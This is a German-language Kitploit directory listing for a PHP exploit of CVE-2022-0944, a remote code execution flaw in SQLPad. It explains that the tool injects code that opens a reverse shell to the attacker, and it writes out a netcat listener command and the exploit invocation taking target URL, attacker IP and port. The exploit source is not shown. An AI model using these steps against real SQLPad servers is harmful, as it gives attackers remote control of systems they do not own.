Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 Remote Code Execution Exploit | Kitploit
Tools/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 Remote Code Execution Exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Funktionsweise:

Dieser PHP-Code wurde entwickelt, um eine Remote Code Execution (RCE)-Sicherheitslücke in SQLPad auszunutzen, die im Zusammenhang mit CVE-2022-0944 steht.
Er funktioniert, indem bösartiger Code in die SQLPad-Anwendung eingeschleust wird, der sie zwingt, einen Systembefehl auszuführen, der eine Reverse Shell öffnet – eine Verbindung, die dem Angreifer die Fernsteuerung des verwundbaren Systems ermöglicht.


Voraussetzungen:

  • PHP CLI – sudo apt-get install php-cli
  • cURL (PHP cURL-Bibliothek) – sudo apt-get install php-curl

Verwendung:

1. Listener einrichten (auf dem Angreifer-Rechner)

Um die Reverse-Shell-Verbindung zu erfassen, starten Sie Netcat auf dem Rechner des Angreifers:

root@kitploit:~
nc -lvnp 4444

Exploit ausführen

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: Die Root-URL der verwundbaren SQLPad-Instanz (z. B. http://target.com:3000)

<attacker_ip>: Die IP-Adresse des Angreifers, die auf die Reverse-Verbindung wartet (dieselbe IP wie bei Netcat)

<attacker_port>: Der Port, auf dem der Angreifer lauscht (derselbe Port wie bei Netcat)


Referenzen

Die ursprüngliche Exploit-Logik basierte auf diesem Repository:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

Mein Ziel war es, die Exploit-Logik zu verstehen und sie als persönliche Herausforderung in einer anderen Programmiersprache neu zu schreiben.

Zusätzliche Referenz: 🔗 CVE-2022-0944 – NVD

Tool herunterladen